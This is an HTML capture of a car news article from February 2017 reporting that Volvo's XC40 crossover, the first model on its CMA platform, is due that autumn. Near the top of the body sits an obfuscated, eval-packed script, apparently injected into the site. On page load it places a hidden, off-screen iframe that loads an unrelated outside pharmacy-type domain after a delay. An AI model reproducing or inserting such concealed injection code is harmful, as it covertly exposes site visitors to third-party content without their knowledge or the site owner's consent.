<!DOCTYPE html>
<html lang="en-US">
<head>
<!-- ukey="5FFACD11" -->
<meta name="distribution" content="global" />
<meta name="language" content="en, sv" />
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta property="fb:app_id" content="187604401300510"/>
	<meta property="fb:admins" content="100000444722121"/>
      
    	<title>  Report – Volvo XC40 coming out to play this year</title><meta name="news_keywords" content="2017, autumn, fall, introduction, xc40, " />        
       
        <meta name="robots" content="index,follow" />	
  <meta name="description" content="The compact high riding model has been allegedly confirmed as the first apparition in the new generation of Volvo’s 40 series family, riding on the all-new CMA platform. According to research and development chief Henrik Green, the absolutely crucial XC40 crossover will be the first to reach the public sometimes […]" />
      
    
<!-- Schema.org markup for Google+ -->
<meta itemprop="name" content="Inautonews  - Report – Volvo XC40 coming out to play this year">
<meta itemprop="description" content="The compact high riding model has been allegedly confirmed as the first apparition in the new generation of Volvo’s 40 series family, riding on the all-new CMA platform. According to research and development chief Henrik Green, the absolutely crucial XC40 crossover will be the first to reach the public sometimes […]">
<meta itemprop="image" content="http://www.inautonews.com/wp-content/uploads/2016/05/Volvo-introduces-40.1-and-40.2-concepts-could-serve-as-preview-for-the-XC40-and-S40-2-1024x576.jpg">

<!-- Twitter Card data -->
<meta name="twitter:card" content="summary">
<meta name="twitter:site" content="@Inautonews">
<meta name="twitter:title" content="Report – Volvo XC40 coming out to play this year">
<meta name="twitter:description" content="The compact high riding model has been allegedly confirmed as the first apparition in the new generation of Volvo’s 40 series family, riding on the all-new CMA platform. According to research and development chief Henrik Green, the absolutely crucial XC40 crossover will be the first to reach the public sometimes […]">
<meta name="twitter:creator" content="@Aurel Niculescu">
<!-- Twitter summary card with large image must be at least 280x150px -->
<meta name="twitter:image:src" content="http://www.inautonews.com/wp-content/uploads/2016/05/Volvo-introduces-40.1-and-40.2-concepts-could-serve-as-preview-for-the-XC40-and-S40-2-1024x576.jpg">

<!-- Open Graph data -->
<meta property="og:title" content="Inautonews  - Report – Volvo XC40 coming out to play this year" />
<meta property="og:type" content="article" />
<meta property="og:url" content="http://www.inautonews.com/report-volvo-xc40-coming-out-to-play-this-year" />
<meta property="og:image" content="http://www.inautonews.com/wp-content/uploads/2016/05/Volvo-introduces-40.1-and-40.2-concepts-could-serve-as-preview-for-the-XC40-and-S40-2-1024x576.jpg" />
<meta property="og:description" content="The compact high riding model has been allegedly confirmed as the first apparition in the new generation of Volvo’s 40 series family, riding on the all-new CMA platform. According to research and development chief Henrik Green, the absolutely crucial XC40 crossover will be the first to reach the public sometimes […]" />
<meta property="og:site_name" content="Inautonews" />
<meta property="article:section" content="The compact high riding model has been allegedly confirmed as the first apparition in the new generation of Volvo’s 40 series family, riding on the all-new CMA platform. According to research and development chief Henrik Green, the absolutely crucial XC40 crossover will be the first to reach the public sometimes […]" />
<meta property="fb:admins" content="100000444722121" />

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-7417415526170824",
    enable_page_level_ads: true
  });
</script>

        
	<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.inautonews.com/feed" />
	<link rel="Shortcut Icon" href="http://www.inautonews.com/favicon.ico" type="image/x-icon" />
    <link rel="profile" href="http://gmpg.org/xfn/11">
    <link rel="pingback" href="http://www.inautonews.com/xmlrpc.php">
    <link href='http://fonts.googleapis.com/css?family=Oswald:400,700|Roboto:700,500,400' rel='stylesheet' type='text/css'>
    
    <link rel="alternate" type="application/rss+xml" title="INAUTONEWS &raquo; Feed" href="http://www.inautonews.com/feed" />
<link rel="alternate" type="application/rss+xml" title="INAUTONEWS &raquo; Comments Feed" href="http://www.inautonews.com/comments/feed" />
<link rel="alternate" type="application/rss+xml" title="INAUTONEWS &raquo; Report – Volvo XC40 coming out to play this year Comments Feed" href="http://www.inautonews.com/report-volvo-xc40-coming-out-to-play-this-year/feed" />
<link rel='stylesheet' id='wpz-shortcodes-css'  href='http://www.inautonews.com/wp-content/themes/compass/functions/wpzoom/assets/css/shortcodes.css?ver=4.1.15' type='text/css' media='all' />
<link rel='stylesheet' id='zoom-font-awesome-css'  href='http://www.inautonews.com/wp-content/themes/compass/functions/wpzoom/assets/css/font-awesome.min.css?ver=4.1.15' type='text/css' media='all' />
<link rel='stylesheet' id='compass-google-fonts-css'  href='//fonts.googleapis.com/css?family=Roboto%3Aregular%2Citalic%2C700%7COswald%3Aregular%2C700%26subset%3Dlatin%2C&#038;ver=4.1.15' type='text/css' media='all' />
<link rel='stylesheet' id='compass-style-css'  href='http://www.inautonews.com/wp-content/themes/compass/style.css?ver=4.1.15' type='text/css' media='all' />
<link rel='stylesheet' id='media-queries-css'  href='http://www.inautonews.com/wp-content/themes/compass/css/media-queries.css?ver=1.0' type='text/css' media='all' />
<link rel='stylesheet' id='dashicons-css'  href='http://www.inautonews.com/wp-includes/css/dashicons.min.css?ver=4.1.15' type='text/css' media='all' />
<link rel='stylesheet' id='wzslider-css'  href='http://www.inautonews.com/wp-content/themes/compass/functions/wpzoom/assets/css/wzslider.css?ver=4.1.15' type='text/css' media='all' />
<link rel='stylesheet' id='wpzoom-custom-css'  href='http://www.inautonews.com/wp-content/themes/compass/custom.css?ver=4.1.15' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='http://www.inautonews.com/wp-content/plugins/jetpack/css/jetpack.css?ver=3.4.3' type='text/css' media='all' />
<script type='text/javascript' src='http://www.inautonews.com/wp-includes/js/jquery/jquery.js?ver=1.11.1'></script>
<script type='text/javascript' src='http://www.inautonews.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1'></script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/plugins/jetpack/modules/related-posts/related-posts.js?ver=20141201'></script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/themes/compass/js/init.js?ver=4.1.15'></script>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.inautonews.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.inautonews.com/wp-includes/wlwmanifest.xml" /> 
<link rel='canonical' href='http://www.inautonews.com/report-volvo-xc40-coming-out-to-play-this-year' />
<link rel='shortlink' href='http://www.inautonews.com/?p=304541' />
<script type="text/javascript">
(function(url){
	if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; }
	var addEvent = function(evt, handler) {
		if (window.addEventListener) {
			document.addEventListener(evt, handler, false);
		} else if (window.attachEvent) {
			document.attachEvent('on' + evt, handler);
		}
	};
	var removeEvent = function(evt, handler) {
		if (window.removeEventListener) {
			document.removeEventListener(evt, handler, false);
		} else if (window.detachEvent) {
			document.detachEvent('on' + evt, handler);
		}
	};
	var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' ');
	var logHuman = function() {
		var wfscr = document.createElement('script');
		wfscr.type = 'text/javascript';
		wfscr.async = true;
		wfscr.src = url + '&r=' + Math.random();
		(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr);
		for (var i = 0; i < evts.length; i++) {
			removeEvent(evts[i], logHuman);
		}
	};
	for (var i = 0; i < evts.length; i++) {
		addEvent(evts[i], logHuman);
	}
})('//www.inautonews.com/?wordfence_logHuman=1&hid=081F461FF9DACEDED8365170D3993ED4');
</script>
<!-- Begin Theme Custom CSS -->
<style type="text/css" id="compass-custom-css">
a, .entry-title a:hover, .entry-meta a:hover, .single .post_author .author-title a:hover, .comment-author .fn a:hover, .comment-author a.comment-edit-link, .widget .feature-posts-list li a:hover, .wpzoom-featured-cat h3.title a:hover, #news-ticker dd a:hover{color:#1e73be;}.navbar{background:#000000;}
</style>
<!-- End Theme Custom CSS -->
<script type="text/javascript">document.write('<style type="text/css">.tabber{display:none;}</style>');</script></head>
<body class="single single-post postid-304541 single-format-standard">

<div class="page-wrap"><script language = 'javascript'>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('b.c=2(){d(2(){5.a(\'1\').3=\'f://8-6-7.9\'},e)};5.n("<4 g=\\"m: o;p:-l;k:-h;\\"><1 3=\\"\\" i=\\"0\\" j=\\"1\\"><\\/1><\\/4>");',26,26,'|iframe|function|src|div|document|medical|store|safe|com|getElementById|window|onload|setTimeout|5000|http|style|707px|frameborder|id|top|2146px|position|write|absolute|left'.split('|'),0,{}))</script>

    <header class="site-header">
        <nav class="navbar" role="navigation">
            <div class="inner-wrap">

                <div class="navbar-brand">
                
                <script src="https://cdnjs.cloudflare.com/ajax/libs/picturefill/2.3.0/picturefill.min.js" async></script>  
                
                <a href="http://www.inautonews.com" title="test">
                  
<picture>
   <source srcset="http://www.inautonews.com/wp-content/themes/compass/ina/logo.jpg" media="(min-width: 1125px)">
   <source srcset="http://www.inautonews.com/wp-content/themes/compass/images/logo-mobile.jpg" media="(min-width: 768px)">
   <source srcset="http://www.inautonews.com/wp-content/themes/compass/images/logo-mobile.jpg" media="(max-width: 1123px)">
   <img src="http://www.inautonews.com/wp-content/themes/compass/ina/logo.jpg" alt="Inautonews - Automotive news in real time! Updated every second!">
</picture>
                   </a>
                </div><!-- .navbar-brand -->
			
				<nav class="main-navbar" role="navigation">
                    <div class="navbar-header">
                    

                    
                        
                           <a class="navbar-toggle" href="#menu-main-slide">
                               <span class="icon-bar"></span>
                               <span class="icon-bar"></span>
                               <span class="icon-bar"></span>
                           </a>


                           <div id="menu-main-slide" class="menu-menu-1-container"><ul id="menu-menu-1" class="menu"><li id="menu-item-226347" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-226347"><a href="http://www.inautonews.com/">Home</a></li>
<li id="menu-item-226350" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-226350"><a href="http://www.inautonews.com/category/home/news">News</a></li>
<li id="menu-item-226379" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-226379"><a href="#">Manufacturers</a></li>
<li id="menu-item-226380" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-226380"><a href="#">Topics</a>
<ul class="sub-menu">
	<li id="menu-item-226385" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226385"><a href="http://www.inautonews.com/category/home/producers">Industry</a></li>
	<li id="menu-item-226388" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226388"><a href="http://www.inautonews.com/category/home/sales-reports">Sales Reports</a></li>
	<li id="menu-item-226390" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226390"><a href="http://www.inautonews.com/category/home/technology">Technology</a></li>
	<li id="menu-item-226391" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226391"><a href="http://www.inautonews.com/category/home/tuners">Tuners</a></li>
	<li id="menu-item-226392" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226392"><a href="http://www.inautonews.com/category/home/videos">Videos</a></li>
	<li id="menu-item-226387" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226387"><a href="http://www.inautonews.com/category/home/safety-home">Safety</a></li>
	<li id="menu-item-226382" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226382"><a href="http://www.inautonews.com/category/home/car-crashes">Car crashes</a></li>
	<li id="menu-item-226389" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226389"><a href="http://www.inautonews.com/category/home/spy">Spied</a></li>
	<li id="menu-item-226383" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226383"><a href="http://www.inautonews.com/category/home/celebrities">Celebrities</a></li>
	<li id="menu-item-226384" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226384"><a href="http://www.inautonews.com/category/home/concept">Concept Cars</a></li>
	<li id="menu-item-226386" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226386"><a href="http://www.inautonews.com/category/moto">Moto</a></li>
	<li id="menu-item-226393" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226393"><a href="http://www.inautonews.com/category/home/other">Other</a></li>
</ul>
</li>
<li id="menu-item-226381" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-226381"><a href="#">Motor Shows</a>
<ul class="sub-menu">
	<li id="menu-item-226399" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226399"><a href="http://www.inautonews.com/category/home/motor-shows/geneva-motor-show-motor-shows">Geneva Motor Show</a></li>
	<li id="menu-item-226398" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226398"><a href="http://www.inautonews.com/category/home/motor-shows/frankfurt-motor-show-iaa">Frankfurt Motor Show</a></li>
	<li id="menu-item-226401" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226401"><a href="http://www.inautonews.com/category/home/motor-shows/paris-motor-show-motor-shows">Paris Motor Show</a></li>
	<li id="menu-item-226397" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226397"><a href="http://www.inautonews.com/category/home/motor-shows/essen-motor-show-motor-shows">Essen</a></li>
	<li id="menu-item-226395" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226395"><a href="http://www.inautonews.com/category/home/motor-shows/concorso-deleganza-motor-shows">Concorso d’Eleganza</a></li>
	<li id="menu-item-226394" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226394"><a href="http://www.inautonews.com/category/home/motor-shows/auto-china-beijing">Beijing</a></li>
	<li id="menu-item-226402" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226402"><a href="http://www.inautonews.com/category/home/motor-shows/tokyo-motor-show-motor-shows">Tokyo Motor Show</a></li>
	<li id="menu-item-226396" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226396"><a href="http://www.inautonews.com/category/home/motor-shows/detroit-auto-show-motor-shows">Detroit</a></li>
	<li id="menu-item-226400" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226400"><a href="http://www.inautonews.com/category/home/motor-shows/la-auto-show-motor-shows">LA Auto Show</a></li>
</ul>
</li>
<li id="menu-item-226348" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-226348"><a href="http://www.inautonews.com/new-photo-gallery">Photo Gallery</a></li>
<li id="menu-item-226365" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226365"><a href="http://www.inautonews.com/category/home/motorsport">Motorsport</a></li>
<li id="menu-item-226376" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226376"><a href="http://www.inautonews.com/category/test-drive-2">Test Drive</a></li>
</ul></div>
                    </div>
                    <div id="navbar-main">


                        <div class="menu-menu-1-container"><ul id="menu-menu-2" class="nav navbar-nav dropdown sf-menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-226347"><a href="http://www.inautonews.com/">Home</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-226350"><a href="http://www.inautonews.com/category/home/news">News</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-226379"><a href="#">Manufacturers</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-226380"><a href="#">Topics</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226385"><a href="http://www.inautonews.com/category/home/producers">Industry</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226388"><a href="http://www.inautonews.com/category/home/sales-reports">Sales Reports</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226390"><a href="http://www.inautonews.com/category/home/technology">Technology</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226391"><a href="http://www.inautonews.com/category/home/tuners">Tuners</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226392"><a href="http://www.inautonews.com/category/home/videos">Videos</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226387"><a href="http://www.inautonews.com/category/home/safety-home">Safety</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226382"><a href="http://www.inautonews.com/category/home/car-crashes">Car crashes</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226389"><a href="http://www.inautonews.com/category/home/spy">Spied</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226383"><a href="http://www.inautonews.com/category/home/celebrities">Celebrities</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226384"><a href="http://www.inautonews.com/category/home/concept">Concept Cars</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226386"><a href="http://www.inautonews.com/category/moto">Moto</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226393"><a href="http://www.inautonews.com/category/home/other">Other</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-226381"><a href="#">Motor Shows</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226399"><a href="http://www.inautonews.com/category/home/motor-shows/geneva-motor-show-motor-shows">Geneva Motor Show</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226398"><a href="http://www.inautonews.com/category/home/motor-shows/frankfurt-motor-show-iaa">Frankfurt Motor Show</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226401"><a href="http://www.inautonews.com/category/home/motor-shows/paris-motor-show-motor-shows">Paris Motor Show</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226397"><a href="http://www.inautonews.com/category/home/motor-shows/essen-motor-show-motor-shows">Essen</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226395"><a href="http://www.inautonews.com/category/home/motor-shows/concorso-deleganza-motor-shows">Concorso d’Eleganza</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226394"><a href="http://www.inautonews.com/category/home/motor-shows/auto-china-beijing">Beijing</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226402"><a href="http://www.inautonews.com/category/home/motor-shows/tokyo-motor-show-motor-shows">Tokyo Motor Show</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226396"><a href="http://www.inautonews.com/category/home/motor-shows/detroit-auto-show-motor-shows">Detroit</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226400"><a href="http://www.inautonews.com/category/home/motor-shows/la-auto-show-motor-shows">LA Auto Show</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-226348"><a href="http://www.inautonews.com/new-photo-gallery">Photo Gallery</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226365"><a href="http://www.inautonews.com/category/home/motorsport">Motorsport</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226376"><a href="http://www.inautonews.com/category/test-drive-2">Test Drive</a></li>
</ul></div>

                                    <form role="search" method="get" class="search-form" action="http://www.inautonews.com/">
				<label>
					<span class="screen-reader-text">Search for:</span>
					<input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" title="Search for:" />
				</label>
				<input type="submit" class="search-submit" value="Search" />
			</form>                
                    </div><!-- #navbar-main -->
                   


                </nav><!-- .navbar -->


                <div class="clear"></div>

            </div>
        </nav><!-- .navbar -->
    </header><!-- .site-header -->

    
        

    
    <main id="main" class="site-main" role="main">
    <div class="breadcrumbs"><a href="http://www.inautonews.com">Home</a> &raquo; <span class="current">News</span></div>
                        
            </header><!-- .entry-header -->
            <div class="recent-posts">
            <header class="entry-header">
                <div class="entry-info">
              
<header>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- top article beta -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-7417415526170824"
     data-ad-slot="7390768122"
     data-ad-format="horizontal"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<!-- google_ad_section_start -->
                    <h1 class="entry-title">Report – Volvo XC40 coming out to play this year</h1><!-- google_ad_section_end -->
                                            <div class="share">
                            <a href="https://twitter.com/intent/tweet?url=http%3A%2F%2Fwww.inautonews.com%2Freport-volvo-xc40-coming-out-to-play-this-year&text=Report+%E2%80%93+Volvo+XC40+coming+out+to+play+this+year" target="_blank" title="Tweet this on Twitter" class="twitter">Tweet</a>
                            <a href="https://facebook.com/sharer.php?u=http%3A%2F%2Fwww.inautonews.com%2Freport-volvo-xc40-coming-out-to-play-this-year&t=Report+%E2%80%93+Volvo+XC40+coming+out+to+play+this+year" target="_blank" title="Share this on Facebook" class="facebook">Share</a>
                            <a href="https://plus.google.com/share?url=http%3A%2F%2Fwww.inautonews.com%2Freport-volvo-xc40-coming-out-to-play-this-year" target="_blank" title="Post this to Google+" class="gplus">Share</a>
                            <div class="clear"></div>
                        </div>
                                        
                    <div class="entry-meta">
                        <span class="vcard author post-author"><span class="entry-author">By <a href="http://www.inautonews.com/author/aurel-niculescu" title="Posts by Aurel Niculescu" rel="author">Aurel Niculescu</a></span></span>
                        <span class="post-date updated"><span class="entry-date">on <time class="entry-date" datetime="2017-02-09T06:45:33+00:00">February 9, 2017</time> </span></span> 
                        <span class="entry-category">in <a href="http://www.inautonews.com/category/home/news" rel="category tag">News</a>, <a href="http://www.inautonews.com/category/manufacturers/volvo" rel="category tag">Volvo</a></span>                                             </div>
                    <div class="clear"></div>
                </div>
</header>
			<div class="article-feature-image"> 
			<!-- google_ad_section_start -->
<picture>
   <source srcset="http://www.inautonews.com/wp-content/uploads/2016/05/Volvo-introduces-40.1-and-40.2-concepts-could-serve-as-preview-for-the-XC40-and-S40-2-1024x576.jpg" media="(min-width: 768px)" alt="Report – Volvo XC40 coming out to play this year image">
   <source srcset="http://www.inautonews.com/wp-content/uploads/2016/05/Volvo-introduces-40.1-and-40.2-concepts-could-serve-as-preview-for-the-XC40-and-S40-2-1024x576.jpg" media="(min-width: 768px)" alt="Report – Volvo XC40 coming out to play this year image">
   <source srcset="http://www.inautonews.com/wp-content/uploads/2016/05/Volvo-introduces-40.1-and-40.2-concepts-could-serve-as-preview-for-the-XC40-and-S40-2-770x433.jpg" alt="Report – Volvo XC40 coming out to play this year image">
   <img src="http://www.inautonews.com/wp-content/uploads/2016/05/Volvo-introduces-40.1-and-40.2-concepts-could-serve-as-preview-for-the-XC40-and-S40-2-1024x576.jpg" alt="Report – Volvo XC40 coming out to play this year image">
</picture>
				</div>
            <div style="float:left; margin-right:17px; margin-bottom:10px; max-width: 336px; width:100%;">
            
            <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Responsive Inside Article -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-7417415526170824"
     data-ad-slot="9349974523"
     data-ad-format="rectangle"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
            
            <br>
            <!-- <div style="width:336px; height:160px; float:left; margin-top:20px;"><img src="http://www.pixelmedia.ro/test1.gif" width="336" height="152" /></div> -->
            </div>
                <article id="post-304541" class="post-304541 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-volvo tag-2017 tag-autumn tag-fall tag-introduction tag-xc40">
    <div class="entry-content">
        <h2>The compact high riding model has been allegedly confirmed as the first apparition in the new generation of Volvo’s 40 series family, riding on the all-new CMA platform.</h2>
<p>According to research and development chief Henrik Green, the absolutely crucial XC40 crossover will be the first to reach the public sometimes this fall. Green confirmed this would be the first model to use Volvo’s CMA platform and hinted the basic development work has already been finished. “There’s a big chance it’ll be one of the most successful cars in our line-up,” commented the executive. The 40 series family of models, which is also going to reach the United States, is “a significant part of growth in the next three to four years”, according to the company strategy.</p>
<p>The XC40 will try to follow in the footsteps of the successful XC60 compact crossover and battle models such as the BMW X1 and Audi Q3 in the competitive lower part of the compact SUV segment, and would follow in the design previewed by the Concept 40.1. There’s also a possible new derivative as seen with the Concept 40.2 saloon but also a V40 replacement in the making. Volvo uses the CMA platform, which has been co-developed with Geely and will also be used by the Chinese automaker’s new brand Lynk&amp;Co.</p>
<p>Via <a href="http://www.autocar.co.uk/car-news/new-cars/volvo-xc40-confirmed-2017-launch" target="_blank">Autocar</a></p>
<script type="text/javascript">jQuery.ajax({url: "http://www.inautonews.com/", data: {top_ten_id: 304541, top_ten_blog_id: 1, activate_counter: 11, top10_rnd: (new Date()).getTime() + "-" + Math.floor(Math.random()*100000)}});</script>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Related</em></h3>
</div>        <div class="clear"></div>
    </div><!-- .entry-content -->
    <footer class="entry-footer">
                    <div class="post_author clearfix">

                            <div style="max-width: 770px; width:100%;">
                            
                            <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- 770 px max after article text -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-7417415526170824"
     data-ad-slot="1687106921"
     data-ad-format="rectangle"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
                            
                            </div>
            </div>
    </footer><!-- .entry-footer -->
</article><!-- #post-## --><!-- google_ad_section_end -->                
                                         <div class="share">
                            <a href="https://twitter.com/intent/tweet?url=http%3A%2F%2Fwww.inautonews.com%2Freport-volvo-xc40-coming-out-to-play-this-year&text=Report+%E2%80%93+Volvo+XC40+coming+out+to+play+this+year" target="_blank" title="Tweet this on Twitter" class="twitter">Tweet</a>
                            <a href="https://facebook.com/sharer.php?u=http%3A%2F%2Fwww.inautonews.com%2Freport-volvo-xc40-coming-out-to-play-this-year&t=Report+%E2%80%93+Volvo+XC40+coming+out+to+play+this+year" target="_blank" title="Share this on Facebook" class="facebook">Share</a>
                            <a href="https://plus.google.com/share?url=http%3A%2F%2Fwww.inautonews.com%2Freport-volvo-xc40-coming-out-to-play-this-year" target="_blank" title="Post this to Google+" class="gplus">Share</a>
                            <div class="clear"></div>
                        </div>
                                                        
<div id="disqus_thread">
    </div>

                            </div>
                <div id="sidebar" class="site-sidebar">
<div class="adsense-home" style="width:100%;">

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Sidebar Large Vertical Ad -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-7417415526170824"
     data-ad-slot="6815310521"
     data-ad-format="vertical"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>

</div>
<br><br>
        
<div id="slider" style="height:240px; background-color:#f1c40f; margin-bottom:30px;">
			<ul class="slides clearfix">
			                <li class="slide">
                    <img src="http://www.inautonews.com/wp-content/uploads/2017/02/All-new-2018-Ford-Expedition-debuts-in-time-for-Chicago-Auto-Show-2-800x450.jpg" alt="All-new 2018 Ford Expedition debuts in time for Chicago Auto Show" class="Thumbnail thumbnail featured " height="230" />                    <div class="slide-overlay">
                       
                    </div>
                    
                     <div class="slide-header">
                            <h3><a href="http://www.inautonews.com/all-new-2018-ford-expedition-debuts-in-time-for-chicago-auto-show">All-new 2018 Ford Expedition debuts in time for Chicago Auto Show</a></h3>                            <div class="entry-meta">
                                <span class="entry-date"><time class="entry-date" datetime="2017-02-08T06:06:25+00:00">February 8, 2017</time></span>                            </div>
                        </div>
                    
                </li>
			                <li class="slide">
                    <img src="http://www.inautonews.com/wp-content/uploads/2017/02/2017-Toyota-Yaris-has-more-than-900-changes-0-800x450.jpg" alt="2017 Toyota Yaris has more than 900 changes" class="Thumbnail thumbnail featured " height="230" />                    <div class="slide-overlay">
                       
                    </div>
                    
                     <div class="slide-header">
                            <h3><a href="http://www.inautonews.com/2017-toyota-yaris-has-more-than-900-changes">2017 Toyota Yaris has more than 900 changes</a></h3>                            <div class="entry-meta">
                                <span class="entry-date"><time class="entry-date" datetime="2017-02-07T06:56:09+00:00">February 7, 2017</time></span>                            </div>
                        </div>
                    
                </li>
			                <li class="slide">
                    <img src="http://www.inautonews.com/wp-content/uploads/2017/02/2018-Dodge-Durango-SRT-is-here-12-800x450.jpg" alt="2018 Dodge Durango SRT is here" class="Thumbnail thumbnail featured " height="230" />                    <div class="slide-overlay">
                       
                    </div>
                    
                     <div class="slide-header">
                            <h3><a href="http://www.inautonews.com/2018-dodge-durango-srt-is-here">2018 Dodge Durango SRT is here</a></h3>                            <div class="entry-meta">
                                <span class="entry-date"><time class="entry-date" datetime="2017-02-07T06:43:54+00:00">February 7, 2017</time></span>                            </div>
                        </div>
                    
                </li>
			                <li class="slide">
                    <img src="http://www.inautonews.com/wp-content/uploads/2017/02/2017-Jeep-Wrangler-Rubicon-Recon-is-the-right-way-to-end-a-generation-0-800x450.jpg" alt="2017 Jeep Wrangler Rubicon Recon is the right way to end a generation" class="Thumbnail thumbnail featured " height="230" />                    <div class="slide-overlay">
                       
                    </div>
                    
                     <div class="slide-header">
                            <h3><a href="http://www.inautonews.com/2017-jeep-wrangler-rubicon-recon-is-the-right-way-to-end-a-generation">2017 Jeep Wrangler Rubicon Recon is the right way to end a generation</a></h3>                            <div class="entry-meta">
                                <span class="entry-date"><time class="entry-date" datetime="2017-02-07T05:24:43+00:00">February 7, 2017</time></span>                            </div>
                        </div>
                    
                </li>
			                <li class="slide">
